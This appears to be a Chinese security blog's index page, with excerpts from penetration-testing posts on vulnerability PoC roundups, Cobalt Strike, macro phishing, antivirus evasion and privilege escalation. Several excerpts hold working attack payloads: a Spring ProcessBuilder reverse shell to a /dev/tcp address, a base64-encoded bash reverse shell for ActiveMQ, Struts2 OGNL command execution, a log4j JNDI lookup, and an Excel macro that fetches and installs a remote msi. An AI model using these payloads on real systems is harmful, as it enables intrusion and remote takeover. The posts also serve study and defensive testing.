自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(45)
  • 收藏
  • 关注

原创 渗透测试小技巧

设置两个会话,就是同时登陆两个数据库,第一个Select GET_LOCK('a',10);4)三者的关系,Rumtime封装了ProcessBuilder的方法,ProcessBuilder封装了ProcessImpl的方法。benchmark(count,expr),count代表执行次数,expr代表执行的语句。1)@是用户变量,select @user from users;2)@@是系统变量,select @@database;3)漏洞攻击(系统漏洞,其他web漏洞,数据库漏洞等等)

2024-03-26 21:02:47 319

原创 渗透测试-网络攻防面试题(非常全面,根据自己经验所写,长期更新)

10)mssql,orcale的一些特定函数和闭合方法---------------------------------------------------------------no------------------------------------------------------1)脏牛内核提权----------------------------------------------no----------------------------------------------

2024-01-03 11:18:05 1328

原创 ElasticSearch漏洞合集及其POC合集

2.ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)5.Elasticsearch写入webshell漏洞(WooYun-2015-110216)3.ElasticSearch 目录穿越漏洞(CVE-2015-3337)4.ElasticSearch 目录穿越漏洞(CVE-2015-5531)3)漏洞版本:

2023-08-21 11:27:48 552

原创 spring漏洞合集及其poc合集

在post请求体中加上_eventId_confirm=&_csrf=4962b53e-b8c7-4290-8fa4-10dd87fd6ead&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.10.7/2233 +0>%261")).start()=vulhub。1)漏洞原理:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。

2023-08-21 11:26:41 539

原创 log4j反序列化远程命令执行以及个人原理理解

目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数,发送到log4j,打印到日志中,开始解析{}中的内容,发现是ldap实现的jndi,然后调用lookup。功能去查找x.x.x.x/test.class该文件,然后发现是远程服务器的文件,需要通过codebase去下载该class类,然后下载后,对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。

2023-08-11 10:08:19 359

原创 struct2(S2)漏洞poc合集以及对应版本

{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}(后有一个换行符)在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞。

2023-08-11 10:06:29 796

原创 fastjson漏洞合集以及是否使用组件判断

3>使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个rmi或者ladp服务。则会发现rmi服务会有回显,而且shell会反弹回来。6>则会发现rmi服务会有回显,而且shell会反弹回来。(3)通过dnslog来判断是否使用了fastjson。2>将class文件放到http服务目录下。(2)查看其fastjson的版本。(1)漏洞版本:1.2.24之前。(1)漏洞版本:1.2.48以前。2)开启监听2233端口。1)写一个java文件。3)开启一个rmi服务。

2023-08-11 10:05:05 797

原创 sqlmap的高级使用-tamper脚本使用、os-shell原理等

(10)concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例。(5)between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=(14)ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例。

2023-07-11 16:54:30 731

原创 nmap的高级使用-参数,脚本,绕过防火墙

-script http-methods --script-args http.useragent=”Mozilla 5” 修改user-agent字段。--script-trace --script=vuln/.... 来查看发送的数据包。--script=http-methods 扫描http允许的方法。--script-help=dos 查看dos脚本的帮助文档。--script=http-brute http认证爆破。--script=http-ls 扫描http目录。

2023-07-11 16:53:33 792

原创 tomcat简单漏洞合集

漏洞原理:开启了put方法,且readonly初始化参数由默认值设置为false。1.tomcat的put方法任意文件伤处(CVE-2017-12615)2.tomcat的apj文件包含漏洞(CVE-2020-1938)漏洞版本:7.0.0-7.0.79。

2023-07-03 08:42:47 273

原创 海康威视漏洞合集

解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头。poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc。漏洞版本:大多数设备。

2023-07-03 08:41:03 4683

原创 Postgresql漏洞合集

需要超级管理员数据库用户(postgres)才可以,因为在9.3版本之后,默认得开启了COPY TO/FROM PROGRAM功能,可以让超级用户去执行任意系统命令。2.PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)1.PostgreSQL 提权漏洞(CVE-2018-1058)漏洞版本:9.3-11.2。漏洞版本:9.3-10。

2023-07-03 08:39:45 927

原创 php、php-dev、php-cgi、php-imap、php-fpm、xxe漏洞合集

执行命令python fpm.py 127.0.0.1 /usr/local/lib/php/PEAR.php -c '

2023-07-02 13:55:31 157

原创 phpmyadmin漏洞合集

../,比如在cmd命令行中,cd 到一个不存在的目录,会报错,在对传参的参数进行过滤时,需要过滤代码,但是传参点很多,需要多次输入过滤代码,开发人员考虑到使用将过滤代码写入过滤文件,通过include包含该文件,来达到一个过滤的目的,假如这个包含的文件是可以控制的,那么就可能导致文件包含,该漏洞中,主要是因为对于传参包含文件的参数过滤时,只是对其内容进行检测白名单验证,只要target参数是白名单中的。但是如果在其后加一个/../,系统会默认认为还是在当前目录,就不会对错误目录进行检查,也就不会报错;

2023-07-02 13:55:29 569

原创 apache httpd漏洞合集

就是上传文件,在1.php文件名后面加一个0x0ahex值进行一个绕过,恰好有解析漏洞,将1.php%0a当做1.php执行。--#exec cmd="id" -->,直接访问,就会显示。3.Apache HTTP Server路径穿越漏洞(CVE-2021-41773、CVE-2021-42013)上传文件,bp抓包修改为123.php.jpg,访问其路径,会以php格式执行。漏洞版本:Apache HTTP Server 2.4.49-2.4.50。漏洞版本:通用,得看是否开启了ssi组件。

2023-07-02 13:54:20 707

原创 activemq漏洞合集

{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 目标地址 61616。http://192.168.110.129:8161/admin/test/systemProperties.jsp查看物理路径。上传显示204,成功,但是该路径下没有解析权限,所以需要使用MOVE方法进行移动到正常的物理路径。弱口令:admin/admin/

2023-07-02 13:52:30 655

原创 solr漏洞合集

在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)漏洞版本:Apache Solr 5.0.0 ~8.3.1。漏洞版本:Apache Solr < 8.2.0。3.solr远程代码执行(CVE-2017-12629)5.solr的XXE漏洞(CVE-2017-12629)2.solr远程代码执行(CVE-2019-0193)漏洞版本:Apache Solr < 7.1。漏洞版本:Apache Solr < 7.1。

2023-07-02 13:51:51 952

原创 flink漏洞合集

1.apache flink文件上传漏洞(CVE-2020-17518)-------未复现出来。漏洞版本:Apache Flink 1.5.1 ~ 1.11.2。漏洞版本:Apache Flink 1.11.0-1.11.2。2.apache flink目录遍历(CVE-2020-17519)

2023-07-02 13:51:19 387

原创 jboss漏洞合集

poc:http://192.168.88.130:8080/jbossmq-httpil/HTTPServerILServlet 若出现This is the JBossMQ HTTP-IL则表示有漏洞。3.JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)2.JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)操作技巧:类似于JBoss 5.x/6.x 反序列化漏洞。漏洞版本:JBoss AS 4.x及之前版本。漏洞版本:5.x/6.x。

2023-07-02 13:50:46 124

原创 thinkphp漏洞合集

post请求-http://192.168.80.129:8080/index.php?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件。s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件。漏洞版本:ThinkPHP < 5.1.23。漏洞版本:5.1.x 5.0.x。

2023-07-02 13:48:54 236

原创 ms17-010-永恒之蓝漏洞

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。使用msf搜索ms17-010,选则scanner模块来判断是否有该漏洞,然后利用ms17_010_eternalblue模块来进行攻击。

2023-07-02 13:48:16 70

原创 openssl-心脏滴血漏洞

但假如A发了一个实际长度只有100字节的数据包,但是报文数值标明了是60000,当这个包发送到B,B就会返回相应包,除了在内存中复制出原来A请求包的100字。该问题出现在openssl协议中的传输层安全,主要的原理是A向B发送一个数据包,数据包中除了有实际的头部信息内容等,还有标明了报文长度的数值,这个数。节,还会多余的复制出59000字节的内存数据,假如该数据中有敏感数据的话,这就导致了信息泄露。据包发送到B时,B只是傻傻的接收数据包,并返回一个包含A请求包的响应包。

2023-07-02 13:47:28 239

原创 内网渗透攻防-cobalt strike全部功能使用2

然后复制到要攻击的目标机器上:shell copy C:\\windows\123.exe(以控制机器-上传上的地址) \\database(目标机器域内名称)\C$\\windows\1.exe(目标机器-想要传到的地址)比如拿下了内网机器,是双网卡,既通外网,也通内网,就可以使用代理,右键点击中转,选择listener选项,payload选择tcp,listenhost填写双网卡的内网地址,端口是跳板机器的端口,会话选择这个跳板机的会话。krbtgt的hash密码-通过minikatz来获取。

2023-06-30 14:32:56 333

原创 内网渗透-cobalt strike全部功能使用1

使用dns的powershell执行命令,接收到之后,执行checkin命令(作用是强制让被控端进行一次回连)作用:利用一个公共域名主机当做cs服务器,解决不在同一局域网的连接机器无法连接的问题,也可以防止其中一台机器。屏幕截图,键盘记录,进程处理,端口扫描,用户发现,文件管理,远程vnc,浏览器代理(仅支持IE)dns的木马隐蔽性更好。走53端口,不会被拦截,就是时间响应慢。是指拿下主机后,对主机执行的一系列操作。的网页代码无法被访问,导致机器下线。beacon类似于cmd和shell。

2023-06-30 14:31:59 95

原创 网络安全之内外网渗透-网络钓鱼技巧

操作:先使用msf生成一个msi文件,放到云服务器上,然后新建一个excle表,右键点击插入宏表,然后第一格输入=EXEC(“msiexec /q /i http://192.168.10.88/123.msi”),第二格输入=HALT()入cs生成的代码,选择auto open选项,然后保存,弹出的框选择否,然后会出现另存为,选择dotm启用宏的文件,在通过邮件发。利用生成的宏代码,放到word中,记得word一定要开启开发者模式,在开发者模式中选择宏,取名,编辑,在编辑弹出的框中加。

2023-06-30 14:30:35 255

原创 网络攻防渗透之内网隧道

不到shell框,然后在外网服务器添加一条端口转发规则,将kali的msf监听端口映射到本机上shell会话的端口,这样,当shell弹回。先生成msf木马,lhost是外网服务器的地址,在内网服务器上运行木马后,会有一个会话到外网服务器,只是没有监听该端口,看。作用:比如我们用kali进行攻击,拿到外网服务器权限后,无法从kali直接去访问内网机器的服务,这时候利用端口转发映射的方法,外网服务器上线后,在会话基础上生成一个监听器,然后利用该监听器生成木马,到内网服务器上执行,则内网服务器会反向连。

2023-06-30 14:26:20 170

原创 网络安全攻防之免杀基础

使用c# xor的shellcode加载器进行免杀,类似于上两个(配合cs)--项目地址:http://github.com/antmanlp/ShellCodeRunner。例如cs生成一个py文件格式的文件,将其中的代码放到shellcode加载文件中,然后用pyinstaller生成一个exe文件,实现免杀。1)替换敏感字符(切记要全部替换,不只是源码,还有文件名等,例如sqlmap太敏感,全部替换成qiao)6)把头部信息删掉(用字符拼起来的sqlmap)5)把帮助源码删掉(help)

2023-06-30 14:25:07 156

原创 redis攻防-ssh登录、主从复制、未授权访问、计划任务、写webshell

cat key.txt | redis-cli -h 192.168.214.138 --pass(有密码则加,没密码不用) 123456 -x set wang。原理是:利用redis数据库将生成的ssh公钥发送到某一个用户./ssh目录下,然后直接利用ssh的私钥连接即可。主从模式,一个redis机器充当主机,可以进行写数据操作,其他的redis机器充当从机,只可以进行读操作。查看数据库中的内容:keys * (redis数据库没有表,是大量的键值对组成的)3)开启保护模式(protect-mode)

2023-06-30 14:24:15 688

原创 网络攻击之应急响应

(6)logontracer (阿里云服务器安装neo4j)-windows。360星图,蓝队工具-splunk,elk。1)mysql:小公司小网站使用的,可以用河马查杀工具,hkkvjuvffo工具。userassisview,文件使用记录。apache的logs/②windows上的系统日志。③linux上的系统日志。(1)先知社区的应急响应大合集。(2)火绒剑-windows。4.追查:(根据表现选择最佳方法)Ⅰ.日志分析(最主要的)Ⅳ. 脚本软件分析。

2023-06-30 14:22:52 84

原创 网络攻防hvv-红蓝对抗

4.权限维持-不死木马(就是进程一直都在运行,不会被任务管理器杀掉,因为一直在运行,所以无法删除)php的不死函数:ignore_user_abort(true)第二种:CTF对抗,也分为两个队,但是每个队伍都有蓝队和红队。第一种:护网,分为两个队,红队(纯攻击)和蓝队(纯防御)在一开始开启waf(有上传就删除)Ⅳ.漏洞利用率(poc/exp)可以用来检测ip,域名,文件等等。Ⅲ.脚本工具(扫描探针等等)红队攻击方法,可以学习。9.微步情报和奇安信威胁平台。

2023-06-30 14:22:41 602

原创 网络安全攻防渗透测试之python开发

xpath爬虫爬取网页信息,筛选,http头部,保存数据到文件中,结合漏洞检测使用。Ⅲ.pocsuit引入poc/exp脚本:(漏扫框架二次开发)根据socket请求返回值来判断端口是否开放。用nslookup+域名来判断是否有cdn。二次开发,修改脚本-根据输入的参数对应文件和函数。利用字典循环,抛出异常,利用ping。普通request请求加上poc测试请求。使用第三方库nmap。使用第三方库nmap。使用第三方库nmap。③启动对应ID的扫描任务。④获取对应ID的扫描状态。

2023-06-30 14:21:40 524

原创 网络攻防之内网安全横向渗透权限提升

schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)

2023-06-30 14:19:29 757

原创 docker基本使用及其命令

(5)端口映射:docker run -tid -p 8080:80 -p3309:3306 -v e:\:/var/www/html --name web 下载下来的镜像名 /bin/bash。docker commit -m="first commit" -a="qiao" web(现在运行镜像的名字) docker账户名称 (-a表示创作者,-m表示说明文字)其中-t为创建一个容器,-i为可以交互,-p是端口映射本机的8080端口映射到docker容器的80端口,-v是目录映射将本机的e:\映。

2023-06-03 16:48:14 54

原创 各种shell反弹方法

s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell。

2023-05-16 11:14:39 2747 1

原创 白盒测试-代码审计

文件上传--找头像上传,move_up_upload_file函数等。常用审计思路,利用idea,中的全局搜索:ctrl+shift+F,引用追踪:alt+f7或查找引用。看指向:外部和內部,自主编写的过滤器在內部项目库中,框架的过滤器在外部项目库。③规则写法(引用内置过滤)-很安全-通过查找框架版本人们发布的poc,测试。Ⅱ.java开发框架:(找漏洞的方式就是找过滤器,绕过)①Shiro:配置文件-web.xml或者pom.xml。②Maven:配置文件-web.xml或者pom.xml。

2023-03-13 19:32:26 410

原创 渗透测试-权限提升

比如:C://program files/a.exe -f,windows识别到空格,认为后面是参数,正确的应该是”C://program files/a.exe“ -f。命令问题:利用tar压缩,文件名改为--参数类型,从而执行 ,利用定时任务,和SUID(其他命令也可,换文件名-参数)先获得webshell,然后进行上传一些文件,进行测试提权(msf或者手动的EXP),然后创建用户,开启端口,远程连接。假如在C://加一个program恶意文件exe后缀,再次执行,则该恶意文件会被执行。

2023-03-13 19:31:29 516

原创 渗透防火墙绕过

隔两三秒),还可以通过修改请求包的user-agent为百度,360等搜索引擎的信息,从而伪造成搜索引擎在爬取网页,从而不会造成拦。Ⅰ.当利用工具进行扫描时,比如扫描路径,对方开启了wafCC流量检测,则返回的结果会产生误报,可以通过延时扫描来绕过(每次扫描间。还可以利用Xray和awvs,bp联合起来,bp当中转,xray当主要扫描工具,awvs当绕过方式(降低速度,请求头爬虫引擎)②自写轮子:自己抓菜刀蚁剑的读取文件,执行命令的数据包,进行解密,然后自己进行修改,达到目的,进行在网页上的操作,

2023-03-13 19:29:42 858

原创 漏洞挖掘的常见姿势

2.web应用:分为已知CMS,通过网上搜索寻找对应的漏洞进行攻击,若不知道CMS,通过白盒代码审计,或者黑盒测试。http/https(主要是web方面):bp,fiddler,抓包精灵,charles。①工具:goby,nmap,nessus(这个最好),openvas,nexpose。扫描工具:xray,awvs,appscan,wpscan,企业內部产品。Ⅰ.端口服务:每个端口的程序都不一定相同,扫描的意义。Ⅱ.类型:远程执行,权限提升,缓冲区溢出。②单点EXP:网上人们公布的EXP。

2023-03-13 19:28:41 237

原创 web漏洞(CSRF-SSRF-文件包含-文件解释-文件下载-目录遍历-sql注入-文件上传-反序列化-XSS-XXE-RCE-逻辑越权)

爆出列名:id=1+and+1=2+union+select+1,null,oid,null,4+from+pg_class+where+relname='表名'+limit+1+offset+0--爆出字段id=1+and+1=2+union+select+1,null,column_name,null,4+from+information_schema.columns+where+table_name='表名'+limit+1+offset+0--例如:filename='1.jpg';

2023-03-13 19:25:34 1012

原创 渗透判断操作系统的方法

数据库:ASP+ACCESS PHP+MYSQL ASPX+MSSQL JSP+ORACEL、MSSQL。还可以通过TTL返回值来判断是哪种操作系统(不太严谨)利用大小写区别,windows兼容,linux不兼容。还可以通过namp命令 namp -o ip。

2023-03-13 19:21:42 111

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除